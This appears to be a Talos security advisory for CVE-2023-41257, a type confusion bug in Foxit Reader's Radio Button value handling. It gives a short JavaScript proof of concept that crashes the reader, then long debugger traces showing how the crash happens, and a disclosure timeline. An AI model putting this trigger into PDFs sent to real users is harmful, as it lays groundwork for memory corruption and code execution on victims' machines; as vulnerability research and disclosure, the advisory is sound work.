CVE-2023-41257
A type confusion vulnerability exists in the way Foxit Reader 12.1.2.15356 handles field value properties. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 12.1.3.15356
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a type confusion vulnerability in the way Foxit Reader handles the value
property of the Radio Button
field. This can be illustrated by the following proof-of-concept code:
function main() {
app.activeDocs[0].getField('Text Field1')['display']
app.activeDocs[0].deletePages();
getField('txt5').setAction("Calculate",'delete_pages();');
app.activeDocs[0].getField('Radio Button0')['value'] = 'a' ;
}
function delete_pages() {
app.activeDocs[0].deletePages()
}
The above code simply assigns a callback function to the Calculate
action for the field txt5
, which is promptly triggered when the value
property of Radio Button0
is set. In the action callback, all that happens is a call to deletePages
, which in turn ends up freeing a large number of objects. It also reset the Radio Button
object and assigns it to a different object. The exact cause of this behaviour is unknown. Later on, when the Radio Button
object is used without its type validation, a type confusion vulnerability occurs. We can observe the following in the debugger (with PageHeap enabled):
0:002> p
Time Travel Position: D46CA:1D56
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b1 esp=072fee4c ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f051:
0258c7b1 ff37 push dword ptr [edi] ds:002b:072fef18=47418ff8
0:002> p
Time Travel Position: D46CA:1D57
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b3 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f053:
0258c7b3 8bce mov ecx,esi
0:002> p
Time Travel Position: D46CA:1D58
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b5 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f055:
0258c7b5 c645fc08 mov byte ptr [ebp-4],8 ss:002b:072feed4=00
0:002> dd esi ; <-------------------------------------- [1]
37193830 00000002 00000000 22af8800 37193710
37193840 00000000 22b04918 00000001 00000001
37193850 00000000 00000004 00000000 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> ba w4 37193830 ; <-------------------------------------- [2]
0:002> p
Time Travel Position: D46CA:1D59
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b9 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff call FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0) ; <---------------- [3]
0:002> u
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff call FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0)
0258c7be 8b5de8 mov ebx,dword ptr [ebp-18h]
0258c7c1 85db test ebx,ebx
0258c7c3 7456 je FoxitPDFReader!safe_vsnprintf+0xf8f0bb (0258c81b)
0258c7c5 c7458800000000 mov dword ptr [ebp-78h],0
0258c7cc c7458c00000000 mov dword ptr [ebp-74h],0
0258c7d3 c7459000000000 mov dword ptr [ebp-70h],0
0258c7da 8d45e0 lea eax,[ebp-20h]
0:002> bp 0258c7be
0:002> p
Breakpoint 3 hit
Time Travel Position: D4E44:C2
eax=00003801 ebx=072fe1dc ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe0e8 ebp=072fe0f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06 mov eax,dword ptr [esi] ds:002b:37193000=00000053
0:002> dd 37193830
37193830 371936e0 00000000 22af8800 37193710
37193840 00000000 22b04918 00000000 00000001
37193850 00000000 00000004 00000000 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> ba w4 3719383c ; <-------------------------------------- [4]
0:002> g
Breakpoint 3 hit
Time Travel Position: D4E45:C05
eax=37193830 ebx=072fe14c ecx=00000000 edx=00000005 esi=00000010 edi=0000000c
eip=01b27f90 esp=072fe08c ebp=072fe094 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52a830:
01b27f90 66894c780c mov word ptr [eax+edi*2+0Ch],cx ds:002b:37193854=0004
[...]
:002> g
Breakpoint 6 hit
Time Travel Position: D5347:FC7
eax=0000001f ebx=04614a58 ecx=00000007 edx=62626952 esi=04614a58 edi=3719383c
eip=03eef09b esp=072fe39c ebp=072fe3c0 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d76b:
03eef09b 83c704 add edi,4
0:002> dd 37193830
37193830 00000001 0000001f 0000001f 62626952
37193840 006e0067 00740061 00720075 005f0065
37193850 002e0031 00000000 00000000 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1BB7
eax=37193830 ebx=00000000 ecx=072fe3d0 edx=37193850 esi=00000000 edi=15faafe4
eip=01b29758 esp=072fe39c ebp=072fe3c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52bff8:
01b29758 8b01 mov eax,dword ptr [ecx] ds:002b:072fe3d0=37193830
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1C33
eax=00003801 ebx=00000000 ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe328 ebp=072fe330 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06 mov eax,dword ptr [esi] ds:002b:37193000=00000053
0:002> g
Breakpoint 4 hit
Time Travel Position: D5354:6E8
eax=ffffffff ebx=00000001 ecx=a8eb98f8 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7be esp=072fee50 ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f05e:
0258c7be 8b5de8 mov ebx,dword ptr [ebp-18h] ss:002b:072feec0=14e46fa8
0:002> dd 37193830 ; <-------------------------------------- [5]
37193830 371936e0 0000001f 0000001f 62626952
37193840 435f6e6f 67657461 5f79726f 74736f50
37193850 6e616353 6974704f 00736e6f 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> da 37193830+c
3719383c "Ribbon_Category_PostScanOptions"
0:002> pc
Time Travel Position: D5354:6F2
eax=072feeb8 ebx=14e46fa8 ecx=072fee60 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7e5 esp=072fee4c ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f085:
0258c7e5 e82678feff call FoxitPDFReader!safe_vsnprintf+0xf768b0 (02574010)
0:002> pc
Time Travel Position: D5358:1008
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=0258c7f0 esp=072fee4c ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f090:
0258c7f0 e89bc93bff call FoxitPDFReader!safe_vsnprintf+0x34ba30 (01949190)
0:002> t
Time Travel Position: D5358:1009
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949190 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba30:
01949190 55 push ebp
0:002> p
Time Travel Position: D5358:100A
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949191 esp=072fee44 ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba31:
01949191 8bec mov ebp,esp
0:002> p
Time Travel Position: D5358:100B
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949193 esp=072fee44 ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba33:
01949193 ff710c push dword ptr [ecx+0Ch] ds:002b:3719383c=62626952 <-------------------------[6]
0:002> p
Time Travel Position: D5358:100C
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949196 esp=072fee40 ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba36:
01949196 ff7508 push dword ptr [ebp+8] ss:002b:072fee4c=072feea4
0:002> p
Time Travel Position: D5358:100D
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949199 esp=072fee3c ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba39:
01949199 e812bdffff call FoxitPDFReader!safe_vsnprintf+0x347750 (01944eb0)
0:002> t
Time Travel Position: D5358:100E
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01944eb0 esp=072fee38 ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x347750:
01944eb0 55 push ebp
0:002> pc
Time Travel Position: D5358:1022
eax=62626952 ebx=14e46fa8 ecx=072fedf0 edx=00000000 esi=37193830 edi=072fef18
eip=01944ef1 esp=072fedd8 ebp=072fee34 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200282
FoxitPDFReader!safe_vsnprintf+0x347791:
01944ef1 e8ca6a1e00 call FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:1039
eax=072fedf0 ebx=14e46fa8 ecx=072fee0c edx=00000004 esi=37193830 edi=072fef18
eip=01944f0f esp=072fedd8 ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477af:
01944f0f e8ac6a1e00 call FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:104C
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01944f1b esp=072fede0 ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477bb:
01944f1b e870b7ffff call FoxitPDFReader!safe_vsnprintf+0x342f30 (01940690)
0:002> t
Time Travel Position: D5358:104D
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940690 esp=072feddc ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f30:
01940690 55 push ebp
0:002> t
Time Travel Position: D5358:104E
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940691 esp=072fedd8 ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f31:
01940691 8bec mov ebp,esp
0:002> p
Time Travel Position: D5358:104F
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940693 esp=072fedd8 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f33:
01940693 6aff push 0FFFFFFFFh
0:002> p
Time Travel Position: D5358:1050
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940695 esp=072fedd4 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f35:
01940695 6829924104 push offset FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x9678f9 (04419229)
0:002> p
Time Travel Position: D5358:1051
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=0194069a esp=072fedd0 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f3a:
0194069a 64a100000000 mov eax,dword ptr fs:[00000000h] fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:1052
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a0 esp=072fedd0 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f40:
019406a0 50 push eax
0:002> p
Time Travel Position: D5358:1053
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a1 esp=072fedcc ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f41:
019406a1 83ec4c sub esp,4Ch
0:002> p
Time Travel Position: D5358:1054
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a4 esp=072fed80 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f44:
019406a4 53 push ebx
0:002> p
Time Travel Position: D5358:1055
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a5 esp=072fed7c ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f45:
019406a5 56 push esi
0:002> p
Time Travel Position: D5358:1056
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a6 esp=072fed78 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f46:
019406a6 57 push edi
0:002> p
Time Travel Position: D5358:1057
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a7 esp=072fed74 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f47:
019406a7 a1e4149405 mov eax,dword ptr [FoxitPDFReader!fLS::FLAGS_log_backtrace_at+0x110180 (059414e4)] ds:002b:059414e4=afc476d4
0:002> p
Time Travel Position: D5358:1058
eax=afc476d4 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ac esp=072fed74 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f4c:
019406ac 33c5 xor eax,ebp
0:002> p
Time Travel Position: D5358:1059
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ae esp=072fed74 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4e:
019406ae 50 push eax
0:002> p
Time Travel Position: D5358:105A
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406af esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4f:
019406af 8d45f4 lea eax,[ebp-0Ch]
0:002> p
Time Travel Position: D5358:105B
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b2 esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f52:
019406b2 64a300000000 mov dword ptr fs:[00000000h],eax fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:105C
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b8 esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f58:
019406b8 8bd9 mov ebx,ecx
0:002> p
Time Travel Position: D5358:105D
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ba esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5a:
019406ba 8b33 mov esi,dword ptr [ebx] ds:002b:072fede8=62626952 <---------------- [7]
0:002> p
Time Travel Position: D5358:105E
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406bc esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5c:
019406bc 85f6 test esi,esi
0:002> p
Time Travel Position: D5358:105F
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406be esp=072fed70 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f5e:
019406be 0f84d9010000 je FoxitPDFReader!safe_vsnprintf+0x34313d (0194089d) [br=0]
At [1]
, we examine the vulnerable field object. The first 4 bytes of the object indicate the type of the field. The Push Button
, Radio Button
and Check Box
fields are indicated by the values 1, 2 and 3 respectively. Here, the vulnerable field object type is the Radio Button. Two breakpoints are set on the write access at different offsets of the vulnerable pointer at [2]
and [4]
. These breakpoints were hit multiple times when the function at [3]
was called. At [5]
, it can be observed that the vulnerable object type is different. Later on, the value at the offset 0x0c
of the vulnerable object is assigned to the esi
register at [6]
and [7]
. The crash occurs later in the code when the memory pointed to by the esi
register is dereferenced. This can be observed in a debugger at the time of the crash:
0:002> g
(11a0.c34): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: D5359:0
eax=00000054 ebx=072fede8 ecx=00000054 edx=00000000 esi=62626962 edi=072fed90
eip=01b366d2 esp=072fed14 ebp=072fed1c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608 div eax,dword ptr [esi+8] ds:002b:6262696a=????????
0:002> u
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608 div eax,dword ptr [esi+8]
01b366d5 8b450c mov eax,dword ptr [ebp+0Ch]
01b366d8 8910 mov dword ptr [eax],edx
01b366da 8b7604 mov esi,dword ptr [esi+4]
01b366dd 85f6 test esi,esi
01b366df 7422 je FoxitPDFReader!safe_vsnprintf+0x538fa3 (01b36703)
01b366e1 8b3496 mov esi,dword ptr [esi+edx*4]
01b366e4 85f6 test esi,esi
0:002> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fed1c 01b36cd0 072fed90 072fed2c 62626962 FoxitPDFReader!safe_vsnprintf+0x538f72
01 072fed30 01801f2a 072fed90 072fed48 a8eb9b8c FoxitPDFReader!safe_vsnprintf+0x539570
02 072fed58 0194073f 072fedc8 072fed90 00000000 FoxitPDFReader!safe_vsnprintf+0x2047ca
03 072fedd8 01944f20 a8eb98e0 37193830 62626952 FoxitPDFReader!safe_vsnprintf+0x342fdf
04 072fee34 0194919e 072feea4 62626952 072feed8 FoxitPDFReader!safe_vsnprintf+0x3477c0
05 072fee44 0258c7f5 072feea4 a8eb980c 13304f40 FoxitPDFReader!safe_vsnprintf+0x34ba3e
06 072feed8 0257767a 2c256ff8 072fef00 ffffffff FoxitPDFReader!safe_vsnprintf+0xf8f095
07 072fef38 02597097 024b2110 072fef7c 072fef64 FoxitPDFReader!safe_vsnprintf+0xf79f1a
08 072fef6c 0256a8b1 48d6cff8 072fef94 0eebf8e0 FoxitPDFReader!safe_vsnprintf+0xf99937
09 072fefc0 02833022 3ddf4ff8 072fefe4 48d6cff8 FoxitPDFReader!safe_vsnprintf+0xf6d151
0a 072feffc 0289d8b0 072ff488 072ff498 4b8aa600 FoxitPDFReader!FXJSE_GetClass+0x552
0b 072ff064 028b30a4 072ff0cc 3dfb3068 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x6a4a0
0c 072ff118 028b2df4 072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7fc94
0d 072ff15c 028b3696 072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f9e4
0e 072ff268 028b2d84 072ff2d8 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x80286
0f 072ff2b0 028b2acc 072ff2d8 072f0001 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f974
10 072ff2dc 02cfcff2 072ff39c 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f6bc
11 072ff3c0 02cf72b0 072ff44c 072ff48c 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c9be2
12 072ff460 02c38c3b 00000005 072ff498 4b8aa600 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c3ea0
13 072ff480 02cb0bea 538856a1 52c3172d 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40582b
14 072ff4bc 02bd4d79 5395209d 539520b9 52c31511 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x47d7da
15 072ff4e8 02bd4d79 538feb6d 53951ec1 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
16 072ff510 02bd3400 538feb6d 538821b1 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
17 072ff528 02bd3229 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fff0
18 072ff554 0286f59e 4b8aa600 53882339 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fe19
19 072ff664 0286f0b2 072ff7f8 4b8aa600 072ff6c0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
1a 072ff6ec 02857da4 072ff7f8 4b8aa600 3dfb3024 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bca2
1b 072ff89c 028578a0 072ff938 3dfb3040 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
1c 072ff8b0 028312af 072ff938 3dfb3040 a8eb8ffc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
1d 072ff928 02831be6 3dfb3024 181ecff8 3dfb3010 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
1e 072ff964 024af2f4 4d2b0fd8 3ff79c8c 181ecff8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
1f 072ff9c8 024b01e0 00000000 072ffa40 072ffa0c FoxitPDFReader!safe_vsnprintf+0xeb1b94
20 072ff9dc 02600775 072ffa40 072ffa0c a8eb8cd0 FoxitPDFReader!safe_vsnprintf+0xeb2a80
21 072ffa04 02600879 00000000 072ffa40 a8eb8cec FoxitPDFReader!safe_vsnprintf+0x1003015
22 072ffa38 024b2360 371b7020 00000113 072ffa5c FoxitPDFReader!safe_vsnprintf+0x1003119
23 072ffa48 00bf7e97 00000113 00007ee6 16fc9251 FoxitPDFReader!safe_vsnprintf+0xeb4c00
24 072ffa5c 769223b3 00000000 00000113 00007ee6 FoxitPDFReader!CryptUIWizExport+0x28147
25 072ffa88 7690ca55 00bf7e80 00000000 00000113 USER32!_InternalCallWinProc+0x2b
26 072ffb58 769117b4 00bf7e80 00000000 00000113 USER32!UserCallWinProc+0x143
27 072ffbcc 769115c0 00000113 072ffbf4 0055d3c4 USER32!DispatchMessageWorker+0x1e4
28 072ffbd8 0055d3c4 0f042ec8 0f042ec8 05ae3738 USER32!DispatchMessageW+0x10
29 072ffbf4 0055d483 05ae3738 0055d3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
2a 072ffc14 040a021e 00000000 05b0fab4 071fb000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
2b 072ffc2c 03e65f48 00140000 00000000 09cac308 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5ee8ee
2c 072ffc78 75de7d59 071fb000 75de7d40 072ffce0 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4618
2d 072ffc88 771ab79b 071fb000 43a1b297 00000000 KERNEL32!BaseThreadInitThunk+0x19
2e 072ffce0 771ab71f ffffffff 771d89db 00000000 ntdll!__RtlUserThreadStart+0x2b
2f 072ffcf0 00000000 03e66017 071fb000 00000000 ntdll!_RtlUserThreadStart+0x1b
In the above debugger output, the crash occurs when esi
is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution. Additionally, it should be noted that this vulenrability is very similar to a previously reported type confusion vulenrability that was tracked as CVE-2023-32664 and TALOS-2023-1795.
2023-09-18 - Vendor Disclosure
2023-11-22 - Vendor Patch Release
2023-11-27 - Public Release
Discovered by Kamlapati Choubey of Cisco Talos.